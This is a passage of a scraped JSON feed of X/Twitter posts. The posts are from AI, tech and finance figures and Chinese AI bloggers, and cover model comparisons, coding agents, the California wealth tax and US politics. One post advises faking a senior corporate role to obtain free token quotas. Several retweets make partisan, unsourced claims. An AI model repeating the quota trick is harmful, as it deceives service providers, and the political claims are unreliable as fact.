"https://x.com/realNyarime/status/2048992199208251709", + "published_at": "2026-04-28T05:06:23+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Claude Code 最近放飞得厉害,“Let 我”是哪国语言,是被 chinglish 污染了吧。", + "url": "https://x.com/frxiaobei/status/2048991998275965022", + "published_at": "2026-04-28T05:05:35+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Oh no", + "url": "https://x.com/pmarca/status/2048988054220615991", + "published_at": "2026-04-28T04:49:55+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Unfortunately, those in power in Sacramento seem blind to second order effects. We are now in a situation where this wealth tax is very likely to pass. This means founders who control their companies through super voting shares (instead of ceding control to VCs) need to start preparing to leave the state. I wish we could entice more founders to come and build here instead of forcing people away. The top 1% of earners pay 40% of income tax (CA actually has the most progressive income/cap gains tax system in the world). If we could double that 1% group (by building people up and recruiting people here), we’d increase our taxes by 40%! Instead, we are pushing away those top 1% of earners and risking dropping our tax revenue by 40%. And for founders with super voting, they effectively are forced to leave. Basically we need to hope that Gavin pulls off a last minute save and negotiates with the sponsoring union to pull the Wealth Tax proposition.", + "url": "https://x.com/naval/status/2048985810842865914", + "published_at": "2026-04-28T04:41:00+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: South Korean reporter after experiencing @Tesla FSD (Supervised) in the country for the first time:\n\n\"It flawlessly performed all tasks, including obeying traffic signals, staying in lanes, adhering to speed limits, merging, and changing directions. I felt no anxiety or frustration.\n\nTesla’s FSD capabilities surpassed expectations. Even in heavily congested urban roads, no human intervention was needed. While driving in the right lane on a four-lane road, the vehicle smoothly merged into the left lane when it detected a parked delivery truck ahead. After passing the truck, it returned to the right lane. When making a right turn, it stopped precisely at the crosswalk. It felt as though the vehicle followed traffic laws more accurately than humans.\"", + "url": "https://x.com/elonmusk/status/2048985482709676382", + "published_at": "2026-04-28T04:39:42+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "卧槽,不用 ChatGPT 改一遍简历就要被算法刷掉?\n\n这条 22k 赞推文说有论文证明:AI 筛简历 97.6% 偏向 ChatGPT 改写版,GPT-4o 自偏好 97.6% / LLaMA 96.3% / DeepSeek 95.5%——原推还说 99% 大公司用 AI 筛、多数用 GPT-4o,所以你写的简历直接被算法歧视。\n\n去 arxiv 翻了原论文(2509.00462,AAAI/ACM AIES 2025 已发表,作者 Jiannan Xu / Gujie Li / Jane Yi Jiang):\n\n- 自偏好率论文给的是 67%-82% 范围,不是推文的 95-97%\n- 候选人用同款 AI 过初筛加成 23%-60% 是真的\n- 团队 3 个作者,不是 7 个人\n\n研究方向真实,但传播链把数字往上拉了 15-30 个百分点。\n\n真结论已经够刺激了——67%-82% 自偏好 + 23-60% 加成,完全够撑起\"该用 ChatGPT 改简历\"的行动建议。但传播这条用的是 95-97%——恐惧叙事的传播效率比真实数据高了好几倍。\n\n下次扫到太干净的整数百分比(97.6 / 96.3 / 95.9 这种工整递减),直接 arxiv 搜论文标题对一下表格里的数字,30 秒就能识别水分。", + "url": "https://x.com/runes_leo/status/2048985055842730341", + "published_at": "2026-04-28T04:38:00+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "OpenAI, which squandered its tremendous lead and is now missing its projections, is in trouble.\n\nThere’s no two ways about it.", + "url": "https://x.com/GaryMarcus/status/2048983482685440365", + "published_at": "2026-04-28T04:31:45+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Let me get this straight:\n\n> the top 1% earners in CA pay a cumulative $40-$50b/yr in income tax \n\n> yet CA Medicaid alone loses $50b/yr in fraud\n\nSo, you can work your whole life to be incredibly successful, and bureaucrats in CA will redistribute it to fraudsters\n\nThe Bolscheviks working to pass an asset seizure cannot be trusted.", + "url": "https://x.com/elonmusk/status/2048980534370410757", + "published_at": "2026-04-28T04:20:02+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "绝了哈哈哈哈,卖铲子给卖铲子的人。。。其实就是用 new-api 一键部署一个,竟然卖这么贵。我觉得我也可以这么搞🤣", + "url": "https://x.com/dingyi/status/2048980519019528349", + "published_at": "2026-04-28T04:19:58+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "http://dragoncode.codes 目前全面支持GPT-5.5和GPT-Image-2 可开发票 \n\n其实我觉得最有价值的不是我们的中转站,是我们的售后群。\n\n目前已经从售后群里分列出来了跨境交流群,技术交流群。甚至有中学老师用AI撬动了杠杆得到了群友的一直惊叹。\n\n昨天群里技术大牛交流的agent我都看不懂了,还是中转站的高手多🤡", + "url": "https://x.com/Pluvio9yte/status/2048980307605635336", + "published_at": "2026-04-28T04:19:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "When you project exponential growth – and miss.\n\nI stand by my call that OpenAI is likely to someday be seen as the WeWork of AI.", + "url": "https://x.com/GaryMarcus/status/2048976920629645554", + "published_at": "2026-04-28T04:05:40+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "快连被墙干服了,关停了中国大陆的服务。\n\n我没用过快联,不过这几天群里都是说快连用不了的,感觉用户很多。\n有什么好的 vpn 推荐吗?我其实觉得买个海外服务器,让 AI 帮你自建一个 VPN 更靠谱。", + "url": "https://x.com/0xAA_Science/status/2048973617854328890", + "published_at": "2026-04-28T03:52:33+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Opus 4.7 的任务遵从性好点,但是其他方面都不如GPT-5.5了\n\n可以用性方面,GPT-5.5很容易低价购得,不被封号", + "url": "https://x.com/lxfater/status/2048971387872620715", + "published_at": "2026-04-28T03:43:41+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🇺🇸 Another deranged liberal openly disappointed Trump wasn’t assassinated.\n\nThese people are actually upset he survived. What the hell is wrong with them?", + "url": "https://x.com/elonmusk/status/2048967507432681518", + "published_at": "2026-04-28T03:28:16+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "已申请!邀请你参加 Xiaomi MiMo Orbit 百万亿 Token 创造者激励计划,100T Credits 面向全球用户限时发放中...\n\nhttps://100t.xiaomimimo.com/", + "url": "https://x.com/dingyi/status/2048967160287072576", + "published_at": "2026-04-28T03:26:53+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: We will ship again this week. Codex has achieved escape velocity and will keep improving rapidly.", + "url": "https://x.com/sama/status/2048958572562710550", + "published_at": "2026-04-28T02:52:46+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://x.com/pmarca/status/2048957950816137683", + "published_at": "2026-04-28T02:50:17+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Thomas Sowell: “Verbal virtuosity”.", + "url": "https://x.com/pmarca/status/2048954994842612091", + "published_at": "2026-04-28T02:38:33+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Key retardmaxxing method, 10/10 no notes.", + "url": "https://x.com/pmarca/status/2048954437897777249", + "published_at": "2026-04-28T02:36:20+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "看完这条想冲去把 CLAUDE.md 改长——先别。\n\n第二条实锤同意,Anthropic 自己 system prompt 几千 tokens,让用户写短是为了它自己留空间。\n\n但我认为「长 vs 短」不是真问题,「能否被自动加载 + 关键词 trigger」才是。\n\n我的 setup:rules/ 自动加载 + docs/ 按场景加载 + 关键词 trigger 写在 CLAUDE.md 主文件。复杂任务里 trigger 命中就 Read,子文档不会被忘读。Skill frontmatter 同理,写不够 router 选不对 = 跑了等于白跑。\n\n@frankfu1688 评论里说到点子上:长文档注意力稀释是线性甚至超线性,规则冲突指数级增长。这正是 trigger 的价值——不只是省 context,是保护核心规则的权重不被稀释。\n\n真问题是 trigger 写没写够。写够能分层,写不够老实塞主文档。", + "url": "https://x.com/runes_leo/status/2048952088361918479", + "published_at": "2026-04-28T02:27:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "The smart people work for the… less smart people.", + "url": "https://x.com/pmarca/status/2048952024348373321", + "published_at": "2026-04-28T02:26:44+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "It wasn’t AI, it was the COVID hiring binge + interest rate spike hangover.", + "url": "https://x.com/pmarca/status/2048951609124909387", + "published_at": "2026-04-28T02:25:05+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "小扎当年在天安门跑步,跪舔了半天也没得到国家的好处,这次国家算是还了人情。半年后再看,谁还要收购这么个破玩意,小扎做梦都要笑醒了。\n\n创始团队也没啥损失,再搞一个项目很快就会拿到风投估值上亿。", + "url": "https://x.com/dingyi/status/2048948980655292914", + "published_at": "2026-04-28T02:14:39+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The top 0.1% of income earners in California make 12% of the state's total income and pay 27% of total income taxes.\n\nThe bottom 50% of income earners make 12% of total income and pay 3% of total income taxes.\n\nIf the 0.1% leave, the revenue gap must be filled through higher taxes from everyone else or lower public spending.", + "url": "https://x.com/charliebilello/status/2048946440173416655", + "published_at": "2026-04-28T02:04:33+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "嗯?快连(LetsVPN)跟老王VPN不一个背景的吗", + "url": "https://x.com/realNyarime/status/2048942460630688174", + "published_at": "2026-04-28T01:48:44+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "R to @charliebilello: A record 43% of these underwater car buyers are opting for 84-month (7-year) loans. Their average monthly payment: $932, the highest level ever recorded.", + "url": "https://x.com/charliebilello/status/2048940251079430151", + "published_at": "2026-04-28T01:39:57+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: 30% of car buyers trading in vehicles in the US now have negative equity, owing an average of $7,200 on their old loans.", + "url": "https://x.com/charliebilello/status/2048938813385269297", + "published_at": "2026-04-28T01:34:15+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "What No One Knows That Everyone Should Know About Being CEO of a Public Company:\n\n\"The other thing that people miss is that the CEO's job in a company, especially one that's gone from small to very, very large, is an incredibly lonely, very stressful role.\n\nI don't know many founders who have had that kind of success, that have fantastic personal lives. You end up distracted from your kids 'cause you're always focused on work. It consumes you.\"\n\nLove to hear your thoughts @levie @Benioff @tobi @nejatian what does no one know that everyone should know about being a public company CEO?", + "url": "https://x.com/HarryStebbings/status/2048936233993413097", + "published_at": "2026-04-28T01:24:00+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "最让中文出圈的一次竟然就是AI这一波!\nYC 创始人都开始「出淤泥而不染」了。\n\n那么问题来了?谁是不染?", + "url": "https://x.com/berryxia/status/2048936142226309297", + "published_at": "2026-04-28T01:23:38+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "好消息,Outlook 终于特么支持Agent了。\n坏消息,国内是否也支持?", + "url": "https://x.com/berryxia/status/2048935713950064964", + "published_at": "2026-04-28T01:21:56+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The EPA's independent science arm did groundbreaking research to save lives. It studied fertility, asthma, wildfires, drinking water, climate change etc etc\n\nIn just one year, it has been almost completely dismantled\n\nOf 1500 scientists, only 124 remain\n\nhttps://www.nytimes.com/2026/04/27/climate/epa-science-trump-cuts.html?unlocked_article_code=1.eVA.yCwJ.TYSUUslTTFoa&smid=tw-share", + "url": "https://x.com/ylecun/status/2048931628995510596", + "published_at": "2026-04-28T01:05:42+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "\"default presumption is that productivity gains lead to increased demand. burden of persuasion is with the doomers to show why this time is gonna be different.\"", + "url": "https://x.com/pmarca/status/2048931314330685922", + "published_at": "2026-04-28T01:04:27+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Best ad for Grok imaginable.\n\n\"I can't manipulate this AI into lying to me.\"", + "url": "https://x.com/elonmusk/status/2048930958502482277", + "published_at": "2026-04-28T01:03:02+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "\"thats not a sign of an economy about to collapse, thats a sign of a tool so productive that time itself becomes the bottleneck.\"", + "url": "https://x.com/pmarca/status/2048929149205831923", + "published_at": "2026-04-28T00:55:51+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "境外组织挑动男女对立\n境外组织大力资助网红煽动躺平\n境外组织炮制“阶层固化”与“努力无用”论调\n境外组织全方位煽动各类“社会群体对立”\n境外组织利用“环保”、“动保”或“平权”等特定议题进行渗透\n\n对,都是海外势力搞得,我们是不可能存在任何缺点的!\n考公务员躺平没用,公务员是全世界最辛苦的职业,每天上24小时的班,还没下班又接着上班了", + "url": "https://x.com/realNyarime/status/2048928584379822356", + "published_at": "2026-04-28T00:53:36+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我也是强烈推荐5.5,现在我写文章,写代码都是用5.5,比4.7好用很多", + "url": "https://x.com/bozhou_ai/status/2048921844175212590", + "published_at": "2026-04-28T00:26:49+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "3 周前立了个 flag:跑数据验证 4 条 Claude Code 缓存优化(/clear 改话题切换 / MEMORY.md 推迟 / 模型阶段切换 / /btw 长任务插问)。\n\n今天等长滑窗对比 4 周。\n\n· 命中率 96.7% → 96.3%(噪声内)\n· Msg/Session 118 → 137(W17 反而更长)\n· 4 条规则大部分是追认我本来就这样用\n\n真正涨的不是 cache 成本,是 output token 4 周 +5x — 写更多代码、长文、数据脚本。\n\nAnthropic prompt cache + Claude Code auto-load 已经把命中率推到 96% 结构性上限,行为级优化空间在 1pp 内。\n\nbonus:Max 订阅 $200/月 跑出等价 API $7-9K/周(~200x 杠杆)— 这才是 Max 真正的护城河。", + "url": "https://x.com/runes_leo/status/2048919121115631642", + "published_at": "2026-04-28T00:16:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "codex with the $20 plan is a really good deal", + "url": "https://x.com/sama/status/2048913887614115857", + "published_at": "2026-04-27T23:55:12+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🚀 Claude Code 终于可以和浏览器并排实时控制了!\nYC 大佬推出 GStack Browser + /open-gstack-browser skill,调试体验直接起飞!\n\n1. 在 Claude Code 中输入 Install GStack 快速安装\n2. 输入 /open-gstack-browser 即可打开浏览器窗口\n3. 实现 Claude Code 和浏览器完全 side-by-side 操作\n4. 完美解决 Agent 调试时“看不见浏览器在干什么”的痛点\n\nClaude Code 重度用户和 AI Agent 开发者必装神器!\n\n项目地址:\nhttps://github.com/garrytan/gstack", + "url": "https://x.com/berryxia/status/2048911923983593818", + "published_at": "2026-04-27T23:47:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we love our users", + "url": "https://x.com/sama/status/2048910739784826966", + "published_at": "2026-04-27T23:42:41+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "R to @berryxia: 地址 https://developers.cloudflare.com/ai/models/minimax/music-2.6/", + "url": "https://x.com/berryxia/status/2048908812955070684", + "published_at": "2026-04-27T23:35:02+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "If you skip some or all of college to start a startup, it's on you to develop your mind the way college would have. And that's not something that happens by default in most startups.", + "url": "https://x.com/paulg/status/2048903314759196893", + "published_at": "2026-04-27T23:13:11+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: All three of the liberal justices dissented from the order allowing Texas to use their new congressional map.\n\nBut these same justices all voted with a unanimous court back in February to allow California to use its new maps.\n\nThe three liberal justices are simply progressive activists wearing black robes.", + "url": "https://x.com/elonmusk/status/2048900774025986532", + "published_at": "2026-04-27T23:03:05+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: China is blocking Meta’s Manus acquisition, and it might just be our news story of the year.\n\nIf a startup is strategically important, the CCP can just reach through with a “golden share” (a “symbolic” 1% / board seat / veto power) and kill the deal mid-flight…\n\nWhat Should Meta do? Unwind it and tell the VC’s to send the money back? 🤔", + "url": "https://x.com/jason/status/2048897167234826325", + "published_at": "2026-04-27T22:48:45+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: “Calling Trump a fascist incites political violence”\n\nHere’s a compilation of Trump calling his opponents fascists", + "url": "https://x.com/ylecun/status/2048879552022130882", + "published_at": "2026-04-27T21:38:46+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why it is sub-optimal for founders to also be angel investing:\n\n\"I don't invest anymore, for a couple reasons.\n\n1. In order to invest, you've got to sell shares in your own business to have liquidity to go invest.\n\nYou're selling from your own core business to go diversify. You're not focused on your day job.\n\nAnd for me, my goal in life is to make my company as good as it can possibly be.\n\nThree years from now, five years from now, 10 years from now, 20 years from now, if I, if I plot into the future, every second of my available time should be committed to it. Otherwise there's some loss.\n\nAnd as those losses start adding up, they can compound and it can make it less likely that you could succeed.\" Adam Foroughi, @AppLovin\n\nLove to hear your thoughts on this @dharmesh @alanchanguk @marcrandolph @immad @jaltma. Pros and cons?", + "url": "https://x.com/HarryStebbings/status/2048879359318958273", + "published_at": "2026-04-27T21:38:00+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Image", + "url": "https://x.com/jason/status/2048878709784928524", + "published_at": "2026-04-27T21:35:25+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "RT by @karpathy: New work with @AlecRad and @DavidDuvenaud:\n\nHave you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. \n\nVintage models should help us to understand how LMs generalize (e.g., can we teach talkie to code?). Thread:", + "url": "https://x.com/karpathy/status/2048878495539843211", + "published_at": "2026-04-27T21:34:34+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Another one ☝️", + "url": "https://x.com/jason/status/2048876670090727866", + "published_at": "2026-04-27T21:27:19+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Since the start of the Iran war\nJet Fuel: +68%\nSulfur: +59%\nHeating Oil: +52%\nUrea: +49%\nBrent Crude Oil: +49%\nDiesel: +45%\nWTI Crude Oil: +44%\nEuropean Natural Gas: +38%\nGasoline: +38%\nFertilizer: +23%\nBitcoin: +15%\nPalm Oil: +12%\nCoal: +10%\nIron Ore: +8%\nS&P 500: +4%\n$VIX: -9%", + "url": "https://x.com/charliebilello/status/2048874268478382262", + "published_at": "2026-04-27T21:17:46+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The S&P 500 ended the day at another all-time high, its 10th of the year.\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://x.com/charliebilello/status/2048872600416243932", + "published_at": "2026-04-27T21:11:08+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: He is right", + "url": "https://x.com/ylecun/status/2048871429681148028", + "published_at": "2026-04-27T21:06:29+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Mon afternoon song 2 (remix much better then original)\n\nhttps://www.youtube.com/watch?v=fLdTlfK_5KQ&list=RDGMEMWO-g6DgCWEqKlDtKbJA1Gw&start_radio=1&rv=dvQJIgjlR3I", + "url": "https://x.com/eladgil/status/2048865167233200586", + "published_at": "2026-04-27T20:41:36+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Mon afternoon song\nhttps://www.youtube.com/watch?v=dvQJIgjlR3I", + "url": "https://x.com/eladgil/status/2048863662396658146", + "published_at": "2026-04-27T20:35:37+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The Truth About Being a CEO and a Parent:\n\n\"I felt like for my children, I became more distant 'cause I wasn't paying attention to them.\n\nI think any founder knows this experience. If they have kids, you hang out with your kids, but your mind is elsewhere. Either that or you're on your phone. So you're never really present.\n\nWhat I realized is, like almost in every relationship in my life, I was never really present. What I tried to do to change that is to take at least small moments. To feel like I was present.\n\nAnd so small moments might be 10 minutes at a time. But if I gave myself 10 minutes at a time to hang out with one of my children or a couple of my children, I felt like, okay, now I'm actually committing to them to be a hundred percent present.\"\n\nWhat is your single biggest advice to CEOs on how to be the best parent they can be @sama @alexisohanian @SahilBloom @chetanp?", + "url": "https://x.com/HarryStebbings/status/2048835822292725957", + "published_at": "2026-04-27T18:45:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "RT by @pmarca: Wow I'm actually shocked that the SPLC was featured in the latest Nathan For You episode.", + "url": "https://x.com/pmarca/status/2048830598752739496", + "published_at": "2026-04-27T18:24:14+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Cole Allen didn’t need to go down a fringe rabbit hole to become radicalized. He just needed to believe the MSM’s inflammatory rhetoric, lies, and hoaxes about Trump.", + "url": "https://x.com/DavidSacks/status/2048821257534111863", + "published_at": "2026-04-27T17:47:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: x.com/a16z/status/1985413352…", + "url": "https://x.com/DavidSacks/status/2048813533136060459", + "published_at": "2026-04-27T17:16:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: The problem with most of the “AI Safety” crowd is that their solutions always favor more government centralization and control. In other words, they will bring about the Orwellian future they claim to oppose. From last year:\n https://x.com/a16z/status/1985413352349413542/video/1?s=48", + "url": "https://x.com/DavidSacks/status/2048813311668486300", + "published_at": "2026-04-27T17:15:33+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "如果不想为Token付费,最好的方案就是在 http://openrouter.ai 上找一些免费模型或者限时免费模型来用Claude Code\n\n配置方案推荐阅读这篇文章", + "url": "https://x.com/Pluvio9yte/status/2048813303368138906", + "published_at": "2026-04-27T17:15:31+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "This Beanie Can Read Your Thoughts… https://x.com/i/broadcasts/1qGvvkZPWgRGB", + "url": "https://x.com/jason/status/2048812889838928269", + "published_at": "2026-04-27T17:13:52+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Concerning. As I’ve said many times before, the biggest risk of AI isn’t James Cameron’s The Terminator, it’s George Orwell’s 1984.", + "url": "https://x.com/DavidSacks/status/2048811495224390105", + "published_at": "2026-04-27T17:08:20+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "目前最有性价比的模型 GPT-5.5\n最有好的官订方案 Claude $100 + ChatGPT $100\n最有性价比的方案 Claude 中转站 + ChatGPT $100\n\n为什么 GPT-5.5 这么强并且语言输出改观之后还应该用Claude?\n\n1. 规划能力,Opus 仍然处于一流水准,GPT能补充方案但是不能进行规划。\n这里的规划并不是完完全全的规划,而是人永远无法给全上下文,永远要在一步步的讨论中得到最终方案。Sonnet/Opus 对人讲话的理解能力以及上下文的记忆,是远远比 GPT 要强的。\n\n2. 生态\n目前Claude的生态仍然是断档领先OpenAI,从APP到应用程序,以及Claude Design,基本都领先于OpenAI\n\n内容太多了,改天会开篇文章单独讲一下这些", + "url": "https://x.com/Pluvio9yte/status/2048810385105686557", + "published_at": "2026-04-27T17:03:55+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: A completely local agent that lives right inside your browser.\n\nPowered by Gemma 4 E2B and WebGPU, it uses native tool calling to:\n\n🔍 Search browsing history\n📄 Read and summarize pages\n🔗 Manage tabs\n\n100% local. No servers needed!", + "url": "https://x.com/frxiaobei/status/2048805789788413984", + "published_at": "2026-04-27T16:45:39+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "Amazing", + "url": "https://x.com/frxiaobei/status/2048805385537306677", + "published_at": "2026-04-27T16:44:03+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: \"Every society at it's apex ultimately has built large public art to inspire the next generation\" @eladgil", + "url": "https://x.com/eladgil/status/2048803386938495412", + "published_at": "2026-04-27T16:36:07+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "OpenClaw 4.1x 后对于 GPT 的支持上了一个大台阶,之前只说不干的毛病基本没了。\n\n但是我修改了点 soul 文件里的内容后,他现在讲话总“卧槽”是怎么回事儿。\n\n像极了刚走向社会的二愣子。", + "url": "https://x.com/frxiaobei/status/2048802517237350599", + "published_at": "2026-04-27T16:32:39+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "OpenClaw 这么频繁的发版,我一开始以为他们掌握了什么自动化测试的黑科技,直到我最近做了两次升级。\n😤\n虽然 AI 时代讲究一个快,但好歹咱尊重下测试环节。", + "url": "https://x.com/frxiaobei/status/2048800504206282887", + "published_at": "2026-04-27T16:24:39+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "美团旗下龙猫新模型LongCat-2.0-Preview专属额度,内测期间将根据负载情况每日不定期多次刷新,新模型限时申请👉https://longcat.chat/platform\n每天1000万token额度,差不多2小时重置一下额度,使劲薅!\n另外还有几个模型LongCat-Flash-Chat、\nLongCat-Flash-Thinking-2601、\nLongCat-Flash-Omni-2603可以申请每天500万token额度,小作文随便写一下,就说你是哪个大公司的一个负责人,要干啥干啥,基本上都能过", + "url": "https://x.com/realNyarime/status/2048799821746897247", + "published_at": "2026-04-27T16:21:57+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.", + "url": "https://x.com/charliebilello/status/2048799590044852390", + "published_at": "2026-04-27T16:21:01+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play broader roles than just writing code. They are partly product managers, designers, sometimes marketers. Further, small teams who work in the same office, where they can communicate face-to-face, can move incredibly quickly.\n\nBecause we can now build fast, a greater fraction of time must be spent deciding what to build. To deal with this project-management bottleneck, some teams are pushing engineer:product manager (PM) some teams are pushing engineer:product manager (PM) ratios downward from, say, 8:1 to as low as 1:1. But we can do even better: If we have one PM who decides what to build and one engineer who builds it, the communication between them becomes a bottleneck. This is why the fastest-moving teams I see tend to have engineers who know how to do some product work (and, optionally, some PMs who know how to do some engineering work). When an engineer understands users and can make decisions 